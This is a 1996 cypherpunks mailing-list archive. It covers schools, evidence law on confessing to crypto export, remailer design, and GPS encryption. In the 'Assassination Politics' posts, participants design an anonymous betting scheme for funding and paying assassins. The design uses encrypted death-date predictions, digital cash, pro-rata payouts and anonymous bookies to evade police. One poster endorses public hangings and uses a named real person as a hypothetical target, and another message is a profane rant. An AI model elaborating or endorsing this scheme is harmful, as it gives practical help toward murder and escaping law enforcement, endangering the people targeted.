# Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From Adamsc at io-online.com Sun Sep 29 01:27:45 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:27:45 +0800 Subject: Public Schools Message-ID: <19960929062437375.AAA157@GIGANTE> On Sat, 28 Sep 1996 20:53:51 -0500 (CDT), snow wrote: >> = . There is a solution. Trade Schools, >> The problem was simple: we have only the now retiring >> toolmakers who make it all possible. engineering graduates will >> not observe the manufacturing floors since it is above their >> dignity to roll up their sleeves. > I knew too many engineering students to believe this. I knew one >(Civil Engineering) who had been a Paramedic, he wanted grease and >dirt on his hands, it may be harder to wash off, but much easier to >sleep off. Nice point, BTW! I think he was engaging in a bit of hyperbole but he still had a point. How many people (in any profession) have had to use what they produce? How many hardware engineers types have had to actually hook up a mission critical network with the router they designed? More likely, how many of you on the list work for someone who has done the same work you're doing? How many of the programmers have to use their own programs on a daily basis? Now, compare with the rest of the world (particularly on that last one). > Prove? I don't know, but it is some pretty solid evidence. Communism >at its finest. A community of people who work together and take care of >each other voluntarily for the common good. Communism should sound familiar to any Jew or Christian. The idea of caring for others in the community is a key part - it's hard to say that you have love for your neighbor if you can't give him a meal while he's out of work (assuming of course you have food yourself - although many in the great depression did anyway).
It's when this kind of activity is state-mandated that you have this problem. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From bdavis at thepoint.net Sun Sep 29 01:36:21 1996 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 29 Sep 1996 16:36:21 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: On Fri, 27 Sep 1996, Timothy C. May wrote: > At 5:43 PM -0400 9/27/96, Black Unicorn wrote: > >On Thu, 26 Sep 1996, Timothy C. May wrote: > > >His admission that he used the notebook. Recovering the notebook and > >finding the software. Interviewing the Customs agent working at the time. > > His admission that he used _which_ notebook? Chain of evidence again. > > Finding _which_ software? > > (As for the Customs agent, I can assure you that my luggage has never been > checked upon either leaving the U.S. or entering the U.S. Even if U.S. > Customs could figure out who was working at the time I putatively entered > the country, and even if he remembered _me_, months later, just what > records would he have, and how would they stand up in court?) > > Hearing me say I "exported crypto," a hearsay claim, and happening to find ^^^^^^^^^^^^^^^ It is an admission against interest and a confession; it is admissible against the speaker in a prosecution against him for "exporting crypto" from a strictly evidentiary standpoint. > one or more laptops at my home, weeks or months later, implies nothing. (To > make the point graphically, suppose the raiding party finds _several_ > laptops or notebooks...do they assume _all_ were taken out of the country, > or do they pick the one with the most incriminating software on it? 
Answer: > Unless they can _prove_ one of them was used, and that it had not been > _changed_ since the putative event (highly unlikely), they cannot simply > _assume_ one of them was taken out. Your understanding of evidence is inaccurate. The evidence re the laptop[s] would be admissible and the parties would argue about what it meant. The jury is entitled to draw common sense inferences. That might be easy to do in a case in which a defendant has confessed.... > (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not > the one I took to Europe." "Oh, you say this laptop has PGP 5.9 on it? > So? I installed it last week. My trip to Europe was last summer.") So now you, as your own lawyer (apparently) have decided to take the stand and testify. Remember that the prosecutor gets to cross-examine you. Things are about to get ugly.... > > >Considering the headaches required for airline travel today, it's not like > >there aren't serious records abound. > > Such as? I recall no inspections of my luggage, no inventorying of the > serial numbers of my laptops, no inspection whatsoever of my > magneto-optical drives (which were in my carry-on luggage, and not even > glanced at, in the box they were in). X-rays would not prove what was taken > in or out of the country, even if "x-ray escrow" were implemented (which it > is not, according to all reports I have heard, and based on some practical > limits on storage), I doubt the records of a trip, say, last summer (of > '95) could be retrieved and prove that a particular laptop was taken out. > Not to mention that the software allegedly taken out might have been on any > kind of media, none of them distinguishable with an x-ray machine. Circumstantial evidence is admissible if probative of a fact at issue in the case. Evidence that you took a laptop out of the country is probative of the allegation that you exported crypto using a laptop. 
> >For crying outloud, he admitted to the world that he took the software > >out. I put that in front of a jury and it looks just like the typical > > "For crying out loud" is bluster, not legal argument. And your understanding of evidence shows a misunderstanding of how the rules of evidence actually work in a courtroom. > >stupid bragging criminal. Any defense about "I was just kidding" or "The > >message was forged" might be interesting, but it will sound like > >technical-mumbo-jumbo to a jury. Yes, it would convince >ME< that was a > > Legal proof is still needed. Given only a nebulous statement like "I > exported crypto in violation of the ITARs," or "I shipped PGP to Europe," > is not enough for a case even to be brought to trial. You are absolutely wrong. It may not be enough for a conviction, but it will beat a Rule 29 motion (Motion for a judgment of acquittal) and get the case to the jury. > (If it reached trial, I would expect a defense attorney to move for > dismissal. Absent any evidence that a crime occurred, absent any proof > beyond the nebulous hearsay statement of a "braggart," there is simply no > basis for criminal action.) > > "Stupid bragging criminals" may be common, but bragging is not in and of > itself illegal. There still has to be evidence of a crime. Must a jury believe that you were "just bragging" because you now, in a criminal trial, say that you were? > "Produce the body." Perry Mason is only active in re-runs. > > (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the > body, or witnesses, does this mean I'll be found guilty? To use BU's > phrasing, "for crying out loud.") That's where prosecutorial discretion comes in and a judge's and jury's common sense comes in if the prosecutor runs amok. BTW, I am far more willing to believe you were bragging about whacking Jimmy Hoffa than about exporting crypto. 
Think of all the interesting evidence from this mailing list's archives that prosecutors would attempt to introduce against you ... Not to say that *I* couldn't get you off, but not the way you propose. EBD > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > From Adamsc at io-online.com Sun Sep 29 01:36:52 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:36:52 +0800 Subject: Public Schools Message-ID: <19960929063154625.AAA234@GIGANTE> On Sat, 28 Sep 1996 23:23:32 -0400 (EDT), themom wrote: >I have to agree with the final Quote....I am Good in math, chemistry and >computer science I am good in any Logical course but I have trouble in >places like " Creative Writing" I take all AP courses and make A's and >B every now and again in english...I have a 3.7 gpa but a LOW sat in the >grammar and english sections, 1100 in all I don't think colleges should >look at the subjects you don't plan to major in...I plan to major in >computer science when I go to college, so I don't think they should look >so much at say english, or biology. I get so frustrated in some of those >classes....BTW I am a Junior in high school I recently graduated HS and am at the local community college preparing to transfer to a 4-year.
Meaningless indicators as follows: 3.9GPA, 1490 SAT (800 Verbal 690 Math - I haven't had a math course since Trig/Precalc in my sophomore year - I was 2 years ahead but moved to 2 districts which didn't even have calculus) - which is up 120 points from my freshman year. Anyway, as far as what colleges look for, they do care about non-major classes but don't, obviously, weight them as highly. As far as the real world (i.e. employment) goes, many places realize you aren't going to learn much in 4 years. They want to see not that you have specific experience but that you know how to think and especially how to teach yourself. If you can show that you can adapt well to market changes you probably won't have to worry about work... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From stewarts at ix.netcom.com Sun Sep 29 01:43:18 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 16:43:18 +0800 Subject: Making Remailers Widespread [REMAILERS] Message-ID: <199609290623.XAA25604@dfw-ix3.ix.netcom.com> There have been several good replies - thanks! >> Doing two-way remailers would be better, but that's still a hard problem, >> and I don't want to widely deploy shoddy two-way-remailers. >Unfortunately, one-way remailers have much fewer uses than two-way remailers, >and many of these uses are abusive. I agree, it's a problem; the return address seems to reduce abuse. But one-way remailers can be used to simulate many of the uses of two-way, especially with message-pool return methods (e.g. alt.anonymous.messages.) Doing two-way remailers well is hard - most of the methods around are ok for passive attacks, but may not resist subpoenas, rubber-hose, or crackers.
It's especially hard if you want the remailer to be a no-brainer to install and operate, rather than one that requires expert support. Snow's one-shot reply block method is interesting, whether you do a public-key or secret-key approach (if you do public key, you obviously use the public half for the part that stays at the remailer.) It has the real advantage that compromising the remailer doesn't give you the reply information for past or current messages, so you can only compromise one message at a time, which is a big win over the one-key-per-remailer reply blocks. I think I like it. On the other hand, there are a host of potential problems: - Chaining is probably more difficult, at least return-chaining. - Individual True Believer remailer operators would usually resist cooperating with authorities to decrypt the reply block, but ad-hoc remailer operators who are just running a remailer because they haven't turned off the default feature that came with their Web Server will probably reveal the key, especially for Politically Incorrect material (definition depends on their individual politics, of course.) - A web form interface, filled out from a web anonymizer, doesn't give you a useful return address, so spammers can still abuse it. - You have to decide how much persistence to use for the reply block. One-shots are more secure, but aren't helpful for replies to web postings or other multiple-recipient communication, but timeouts have their own problems. >> - A centralized block list (e.g. http://www.remailer.net/block.txt) >> which all of the form-based remailers could load and reference would >> allow non-picky operators not to have to handle it themselves >A single centralized point of failure is bad. Maybe 4 or 5 redundant ones. >A blocking request sent to one will be replicated in the other automatically. Good point. 
A bit tough to implement in a no-brainer out-of-the-box remailer; you gain a bit by having the block list point to an address that's really a round-robin DNS spinner of some sort, but that still leaves you with centralization. >> [centralized blocking list; handshake with cookies ] >> - this is a bit messier for mailing lists, but we can ignore... > >We can't quite ignore... In the scheme you've just described, someone can >enter a blocking request via a Web page and give a submission request for >some mailing list, and the cookie will be e-mailed to the mailing list. Yeah. This makes it easy to block anonymous remailer input to (say) the cypherpunks mailing list, since _any_ mailing list user can block. Putting a never-block list at the blocking server is a possibility, and would require some announced policy for implementing it. >> - special-case for "postmaster", who may want to block >> all of foo.domain instead of just postmaster at foo.domain >> - special-special-case for postmasters of big sites, e.g. aol, netcom >> who we may want to ignore? >I don't think it's a good idea to support blocking receivers in an entire >domain, like *@aol.com. Just say it's not supported. Blocking an entire domain like *@aol.com is mostly bad. Blocking an entire domain like *@myconsultingfirm.com is fine. Deciding the boundary between the two is, um, amusing :-) I'd probably set it such that ISPs don't get blocked, but non-ISPs do, though that might change if the administrator of aol.com asks five million users to submit individual blocking requests. I suppose this means there's a volume question here :-) Having a don't-block list that individuals can subscribe to would help. >> - A sender-blocking list is harder, and may still take human attention >I don't think it's a good idea to support sender blocking at all. There are some spammers you'd like to stop quickly when a Spam Event is happening. There are broken email gateways that may need blocking.
There are known abusers you might want stopped. And there are folks like president at whitehouse.gov who can be presumed to be forgeries :-) A sender-blocking list administered by the Remailer Cabal* would be a reasonable default for no-brainer remailers, and obviously it should be possible for remailer-admins to override or ignore if they want. >Would the receiver blocking list be available to everyone to view? That >sounds like a violation of privacy. Someone suggested on this list that >(assuming that the entires are addresses that match exactly, not regular >expressions), one can store hashes of addresses. That's worth doing, or at least thinking about seriously. The most interesting regular expressions are *@domain (which you can handle by keeping separate block lists for domains and full addresses (or a merged list that the using remailer checks both)) and *@*.domain and user@*.domain - e.g. alice at mailserver17.big-isp.com, which would successfully deliver mail to alice at big-isp.com. Perhaps the system needs to keep two hashes - hash(alice),hash(big-isp.com) and check subsets of the domain name? This is creeping featurism, but it may be the right way to go to set a good precedent. One unfortunate result of only using hashed names and not readable names is that it doesn't help the current remailer operators, since their existing code doesn't work that way. Keeping the file of real names encrypted and only distributing it to the Remailer Cabal seems leaky at best :-) - I'd expect to see it remailed to some public place just on principle. snow wrote: > Off the top of my head, the biggest problem is that you can't send > email to a web site (page). You can easily send it to a procmail program at a web site, though, which can take care of doing the right thing with it. Mark M.'s pointer to netcat is especially relevant for this. > Netcat can be used pretty easily to fetch URLs > (e.g. echo "GET /foobar.html HTTP/1.0" | nc www.webserver.com 80). 
[*The existence of the Remailer Cabal, viewed by some as a shadowy subversive conspiracy, and by others as Dedicated Public Servants has been repeatedly denied by anyone in a position to know. :-) ] # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jimbell at pacifier.com Sun Sep 29 02:15:14 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 29 Sep 1996 17:15:14 +0800 Subject: Technical difficulties with AP [AP NOISE] Message-ID: <199609290715.AAA12227@mail.pacifier.com> At 09:07 PM 9/28/96 -0700, Bill Stewart wrote: >Aside from details like dead bodies, vendettas, and government suppression, >there are technical complications with Assassination Politics >that make it more than the simple job Jim Bell is imagining. >Some of them provide ways to defend against AP, and turn it into more like >Extortion Politics. > > [Do I _really_ want to bring up more discussion of AP? > Not sure, but if it's clear that it won't work very well, > it'll be less likely for the government media to freak about :-)] OTOH, if it's going to work, the earlier you're satisfied about that the better, huh? >Let's look at the critical part of the problem - paying the assassin. >The model we've generally been using is that the players are the >victim, the escrow agent who manages the system, an enthusiastic public, >and the assassin or assassins who are competing for the jackpot. All of whom could play multiple roles in difference circumstances, incidentally, at different times. The public should be particularly interested in this process, BTW, because they realize that someday they may want to participate as donors, bettors, or they may have no choice but to participate as...victims. 
>I can see three approaches to identifying the correct payee: >1) Payee provides physical evidence to the escrow agent - > the traditional approach doesn't work here: since the > escrow agent is anonymous, so you can't mail him the > victim's wallet or finger with well-known fingerprint or whatever. >2) Assassin leaves physical evidence at the scene which the news media > would be likely to report, which payee confirms with escrow > agent, presumably committing in advance (e.g. after the event, > the payee sends a key which allows the escrow agent to decode > the encrypted message that said "I'm leaving a note on the body > saying 'Jacques De Molay is Avenged - Assassin's Guild Member #32767'.") > Works fine for the first couple of assassinations, but after a while > the police will catch on and stop revealing kinky details to the media. >3) The main solution has been the gambling deal - > it's just a lottery on the date of death of the victim, which presumably > the payee will win because he knows when the assassin will strike. > For a lottery to be effective, prospective assassins need to > be able to determine how much the jackpot is and who the victim is, > so they can place their bets and be the closest winner. There are a number of advantages to the gambling scenario. The first, obviously, is that it is, technically, gambling, and gambling is legal in many locales and "accepted" (morally) in most. The second is that being gambling, no participant other than an assassin knows, for sure, that the person collecting the payoff is actually guilty of any crime. A third is that to many people, gambling is fun, which means that they are already primed to partipate. > But the prospective victim can also play, individually or as part > of an insurance pool (which is especially valuable for victims like > "the first IRS agent to be assassinated".) 
Obviously you don't want > to just bid up the price on your own head, so it needs to be accompanied > by publicity that the IRS Agents' Benevolent Association is placing > a large number of small bets every day to maximize the chances that > _they_ will collect the money rather than the assassins. > If the times that the bets are for are published, you can beat this, > but you also invite speculators to be small bets just before and after > your bets, so it becomes a mishmash and perhaps a race condition. > If the times aren't published, the assassin can make lots of bets > surrounding the planned date of the hit, which is also a warning > to the prospective victim to be careful if the bets on his demise > start increasing rapidly. The way I've envisioned it, the bettor must commit to his prediction, but he then encrypts it so that nobody else knows what he's predicted, either the date or the target, and he must "buy" his prediction by including digital cash. One advantage of this system is that the victim isn't warned (although the victim is already aware of how much money has been donated to fund the prize), but a potential disadvantage is that there might be a collision between the predictions of two or more people. This probably can't be entirely avoided, but it can be minimized by forcing the bettors to compete with their bets. It is impractical for a person who just guesses to make such a bet, against somebody who knows the date. The bettor doesn't reveal the decrypt key to the particular prediction involved unless he chooses to do so; when he does presumably, it's because the prediction has come true. A failed prediction isn't disclosed, so it doesn't alert anyone else, including the "escrow agent" AP organization. The amount of digital cash included with the prediction will be revealed publicly, the moment it is received by the organization, as well as the (still encrypted) prediction. 
Saving these predictions allows anyone to verify (after the decrypt key has been released) that the prediction actually identified a particular person. This allows the public and the other players to verify that the game is being played honestly. > This does make the AP lottery somewhat of an extortion deal - > by advertising that someone is a target, you're forcing them to > continually make lots of bets. This, of course, is only true if the specifics of the predictions are revealed, which is not the scenario I envision. Obviously, revealing the predictions allows the victim to lay low whever he's likely to be hit, which is why I think that's a bad idea. > But if they've got any way of tracing > money, even partially, it'll help them find the escrow agent, > who can then be targeted for justice of one sort or another. > You're also forcing the assassin to make lots of bets, though in > a jackpot system the successful payee will recover most of it. It is at least conceivable that an assassin won't know the exact date he'll be successful. If he sends a letter-bomb, for instance, he won't know for sure when that letter will be delivered, or the day it will be opened. However, he need merely make two or three predictions, and he won't have to make the last one or two unless the prediction didn't come true on the first day. Multiple predictions does raise his cost, but it will still be economical to do given the probabilities. > To some extent the defense can be fought if the escrow agent > wants to establish a minimum bet, say $100, which an assassin > can afford to make a few of for the targeted day, but the > victim can't keep paying too much. This also reduces the > since of the potential better pool, and therefore reduces > the jackpot and the attractiveness of the job to the assassin. > Lots of people might be willing to spend $5 to contribute; > $100 bets are much fewer, especially if there are enough > targets to successfully overthrow a government. 
Originally, I had anticipated that the AP organization would require specific payments included with a prediction based on the value of the reward and the estimated probability of the death on any particular day. I was never comfortable with this system, because it would involve a great deal of calculation based on numbers that no particular people know. I don't know whether you saw my idea a couple weeks ago in which I pointed out that it should merely be necessary to allow all predictors to include whatever amount of money they want with their prediction, with the reward split up and paid to all successful predictors, pro-rated based on the size of their contribution. This shifts the burden to the public to estimate the amount they should include, which should be okay since a predictor is probably a fairly good judge of the probabilities associated with his target. At least hypothetically, it means that an assassin might have a portion of his reward "stolen" by another lucky predictor, but this is unlikely and in any case, the fact that this loss was genuine can be verified by all participates after the fact. And a predictor need merely increase the value included with the prediction to increase his pro-rata share of the reward. Jim Bell jimbell at pacifier.com From attila at primenet.com Sun Sep 29 02:58:02 1996 From: attila at primenet.com (attila) Date: Sun, 29 Sep 1996 17:58:02 +0800 Subject: Public Schools In-Reply-To: <19960929061014609.AAA180@GIGANTE> Message-ID: <199609290816.CAA26768@infowest.com> In <19960929061014609.AAA180 at GIGANTE>, on 09/28/96 at 11:11 PM, Adamsc at io-online.com (Adamsc) said: On Fri, 27 Sep 1996 22:36:57 -0800, Timothy C. May wrote: > attila wrote: >> a very unusual situation --but I live in rural southern utah >>where the regional middle school of 1200 can support 4 bands, the >> top 2 being very impressive, and provide full AP classes, and ACT >Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special >Lecturer? 
(I knew Idaho has special Militia classes, but to hear that Utah is >now teaching Assassination Politics is pretty impressive.) Now, ignoring the humorous parts, wouldn't that be a scary thought? Pro-AP high school students? I could just imagine the death toll rising as the "popular" students are knocked off by jealous rivals, as the dumped [boy/girl]friend gets even, etc. It'd be hard for any non-homeschooled student to live to 18. considering our history of persecution, and our acceptance of the bloody marches across America, driven by mobs --I doubt you could get a Jim Bell AP movement going. despite the fact the Federal army (an entire army) occupied Utah for almost 50 years and the U.S. refused statehood for almost 50 years, everyone is still basically very patriotic. yeah, as a humorous thought for the theatre of the absurd, active AP might be ideal in NYC, LA, Chicago, Detroit, Cleveland, Buffalo, and the District of Columbia with surrounding regions. let them clean themselves up for 9 cents a pop. can't you just see Marion Barry on his knees begging for his life, promising to keep you in crack heaven!? "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) and, if this is not the gawd-awful truth, I must have just got off the bus... typical, typical MS arrogance. a toast! a toast to their early demise! From dlv at bwalk.dm.com Sun Sep 29 03:02:45 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 18:02:45 +0800 Subject: [AP] Afghanistan Message-ID: Afghanis publicly hanged their former president, Najibullah [no last name]. Other countries should follow their example.
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sun Sep 29 03:12:59 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 18:12:59 +0800 Subject: Looking for Qualified Individual/Firm to Contract for Cryptanalysis In-Reply-To: <01BBAD88.C073E980@geeman.vip.best.com> Message-ID: "geeman at best.com" writes: > Huh? > Since when is (408) in San Diego? San Jose then. San something or other. Silicon Valley. I dislike California enough to view it as one undifferentiated nasty blob. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sun Sep 29 03:41:44 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 18:41:44 +0800 Subject: GPS In-Reply-To: <199609290407.VAA20249@dfw-ix3.ix.netcom.com> Message-ID: Bill Stewart writes: > >I think figuring out a way to turn off A/S and getting accurate GPS on > >commercial equipment at all times would make a nifty Cypherpunks project > >- if it really involves breaking some encryption. > > Essentially the A/S works by having the publicly-readable signal > contain fuzz fuzz in the low-order bits and the encrypted signal contain > the real stuff; if they've done decent encryption, you won't crack it. Do we know for sure that they've got decent encryption? Aircraft aren't the only market for GPS. There's a fad to put GPS in cars - it's already very common in Japan, and Americans are catching up. They're used in conjunction with computerized road maps. Here improving the accuracy of one's position on the map might make for a very successful commercial product. 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sun Sep 29 03:51:10 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 18:51:10 +0800 Subject: Technical difficulties with AP [AP NOISE] In-Reply-To: <199609290407.VAA20253@dfw-ix3.ix.netcom.com> Message-ID: Bill Stewart writes: ... > 2) Assassin leaves physical evidence at the scene which the news media > would be likely to report, which payee confirms with escrow > agent, presumably committing in advance (e.g. after the event, > the payee sends a key which allows the escrow agent to decode > the encrypted message that said "I'm leaving a note on the body > saying 'Jacques De Molay is Avenged - Assassin's Guild Member #32767' > Works fine for the first couple of assassinations, but after a while > the police will catch on and stop revealing kinky details to the medi ... I don't think it matters who the actual assassin is. Re-read Jim's essay. Let's suppose Tim May, the notorious deranged psychipath, wants my pal Ether Dyson dead. Tim May places a bet with a bookie that Ether Dyson lives for another year, affecting the odds. A horde of potential assassins see that the odds have changed, and place bets of their own that she won't live for another year. Then they all try to nail her. If one of them succeeds, then everyone who bet against Tim May has won, and it doesn't matter which one nailed her. After the hit, the pigs would likely want to look at the list of people who bet one way or the other, which is why the communications with the bookie should be anonymous. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From gdcochra at utep.edu Sun Sep 29 04:04:03 1996 From: gdcochra at utep.edu (Gerard D. Cochrane Jr.) 
Date: Sun, 29 Sep 1996 19:04:03 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: On Sun, 29 Sep 1996, Brian Davis wrote: > On Fri, 27 Sep 1996, Timothy C. May wrote: > > > At 5:43 PM -0400 9/27/96, Black Unicorn wrote: > > >On Thu, 26 Sep 1996, Timothy C. May wrote: > > > > >His admission that he used the notebook. Recovering the notebook and > > >finding the software. Interviewing the Customs agent working at the time. > > > > His admission that he used _which_ notebook? Chain of evidence again. > > > > Finding _which_ software? > > > > (As for the Customs agent, I can assure you that my luggage has never been > > checked upon either leaving the U.S. or entering the U.S. Even if U.S. > > Customs could figure out who was working at the time I putatively entered > > the country, and even if he remembered _me_, months later, just what > > records would he have, and how would they stand up in court?) > > > > Hearing me say I "exported crypto," a hearsay claim, and happening to find > ^^^^^^^^^^^^^^^ > It is an admission against interest and a confession; it is admissible > against the speaker in a prosecution against him for "exporting crypto" > from a strictly evidentiary standpoint. > > > one or more laptops at my home, weeks or months later, implies nothing. (To > > make the point graphically, suppose the raiding party finds _several_ > > laptops or notebooks...do they assume _all_ were taken out of the country, > > or do they pick the one with the most incriminating software on it? Answer: > > Unless they can _prove_ one of them was used, and that it had not been > > _changed_ since the putative event (highly unlikely), they cannot simply > > _assume_ one of them was taken out. > > Your understanding of evidence is inaccurate. The evidence re the > laptop[s] would be admissible and the parties would argue about what it > meant. The jury is entitled to draw common sense inferences. 
That might > be easy to do in a case in which a defendant has confessed.... > > > > > (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not > > the one I took to Europe." "Oh, you say this laptop has PGP 5.9 on it? > > So? I installed it last week. My trip to Europe was last summer.") > > So now you, as your own lawyer (apparently) have decided to take the > stand and testify. Remember that the prosecutor gets to cross-examine > you. Things are about to get ugly.... > > > > > > >Considering the headaches required for airline travel today, it's not like > > >there aren't serious records abound. > > > > Such as? I recall no inspections of my luggage, no inventorying of the > > serial numbers of my laptops, no inspection whatsoever of my > > magneto-optical drives (which were in my carry-on luggage, and not even > > glanced at, in the box they were in). X-rays would not prove what was taken > > in or out of the country, even if "x-ray escrow" were implemented (which it > > is not, according to all reports I have heard, and based on some practical > > limits on storage), I doubt the records of a trip, say, last summer (of > > '95) could be retrieved and prove that a particular laptop was taken out. > > Not to mention that the software allegedly taken out might have been on any > > kind of media, none of them distinguishable with an x-ray machine. > > Circumstantial evidence is admissible if probative of a fact at issue in > the case. Evidence that you took a laptop out of the country is > probative of the allegation that you exported crypto using a laptop. > > > > > >For crying outloud, he admitted to the world that he took the software > > >out. I put that in front of a jury and it looks just like the typical > > > > "For crying out loud" is bluster, not legal argument. > > And your understanding of evidence shows a misunderstanding of how the > rules of evidence actually work in a courtroom. > > > > >stupid bragging criminal. 
Any defense about "I was just kidding" or "The > > >message was forged" might be interesting, but it will sound like > > >technical-mumbo-jumbo to a jury. Yes, it would convince >ME< that was a > > > > Legal proof is still needed. Given only a nebulous statement like "I > > exported crypto in violation of the ITARs," or "I shipped PGP to Europe," > > is not enough for a case even to be brought to trial. > > You are absolutely wrong. It may not be enough for a conviction, but it > will beat a Rule 29 motion (Motion for a judgment of acquittal) and get > the case to the jury. > > > (If it reached trial, I would expect a defense attorney to move for > > dismissal. Absent any evidence that a crime occurred, absent any proof > > beyond the nebulous hearsay statement of a "braggart," there is simply no > > basis for criminal action.) > > > > "Stupid bragging criminals" may be common, but bragging is not in and of > > itself illegal. There still has to be evidence of a crime. > > Must a jury believe that you were "just bragging" because you now, in a > criminal trial, say that you were? > > > > "Produce the body." > > Perry Mason is only active in re-runs. > > > > > (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the > > body, or witnesses, does this mean I'll be found guilty? To use BU's > > phrasing, "for crying out loud.") > > That's where prosecutorial discretion comes in and a judge's and jury's > common sense comes in if the prosecutor runs amok. > > BTW, I am far more willing to believe you were bragging about whacking > Jimmy Hoffa than about exporting crypto. Think of all the interesting > evidence from this mailing list's archives that prosecutors would attempt > to introduce against you ... > > Not to say that *I* couldn't get you off, but not the way you propose. > > EBD > > > > > --Tim May > > > > We got computers, we're tapping phone lines, I know that that ain't allowed. 
> > ---------:---------:---------:---------:---------:---------:---------:---- > > Timothy C. May | Crypto Anarchy: encryption, digital money, > > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > > "National borders aren't even speed bumps on the information superhighway." > > > > > > > > > > > YEAH FUCK YOU.. YOUR ALL FUCKING STUPID ... DONT FUCKIN WRITE THIS SHIT.. YER ALL DUMB STUPID LITTLE 5 YEAR OLDS WHO KNOW JACK SHIT.. GET OFF THE FUCKIN SUBJECT YOU LAME ASS WHOREs.. FUCKIN YOU WANT A REAL FELONY.. TRY TO HACK MY SYSTEM... THIS SYTEM CANNOT BE HACKED IF YOU GET ROOT I GIVE YOU PERMISSION TO NUKE MY SYS.. FUCK YOU BASTARDS... STUPID NUTSAKCS. From dsmith at prairienet.org Sun Sep 29 04:19:34 1996 From: dsmith at prairienet.org (David E. Smith) Date: Sun, 29 Sep 1996 19:19:34 +0800 Subject: What about making re-mailers automatically chain? Message-ID: <199609290914.EAA09458@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: gcg at pb.net, cypherpunks at toad.com Date: Sun Sep 29 04:06:38 1996 > Would it be a good idea to have a re-mailer "randomly" decide whether > to > send the mail to the destination or to another re-mailer. If all > re-mailers performed this way, not even the sender would know the path. > The chain could be short sometimes and long others. Granted, there is > a > possibility that every mailer decides to chain instead of sending the > message to the recip, but some clever counter tag could keep the number > of > links to a certain maximum. The "randomness" of this would aid in > traffic > analysis, and of course each mailer that decides to chain the mail > would > encrypt under the next mailer's pub key. Any thoughts? I dunno about that one. 
Even if the message itself is encrypted, every remailer has to have the address of the final recipient for your plan to work. And if you have cleartext for that message (oops!) then any remailer operator could read it. More traffic is of course a good thing, but I'm just kinda iffy on the concept. dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "Madness takes its toll . . . please have exact change ready." From erp at digiforest.com Sun Sep 29 04:54:41 1996 From: erp at digiforest.com (Erp) Date: Sun, 29 Sep 1996 19:54:41 +0800 Subject: Cryptography.. Message-ID: What is the maximum encryption allowed to be created. With export restrictions in mind, and without export restrictiosn in mind... Thanks... By WORLD and US standards please... much appreciated.. export from the US to elsewhere that is also.. reply asap is much appreciated From bdavis at thepoint.net Sun Sep 29 05:38:24 1996 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 29 Sep 1996 20:38:24 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: On Sun, 29 Sep 1996, Gerard D. Cochrane Jr. wrote: > On Sun, 29 Sep 1996, Brian Davis wrote: > > > On Fri, 27 Sep 1996, Timothy C. May wrote: > > YEAH FUCK YOU.. YOUR ALL FUCKING STUPID ... DONT FUCKIN WRITE THIS SHIT.. > YER ALL DUMB STUPID LITTLE 5 YEAR OLDS WHO KNOW JACK SHIT.. GET OFF THE > FUCKIN SUBJECT YOU LAME ASS WHOREs..
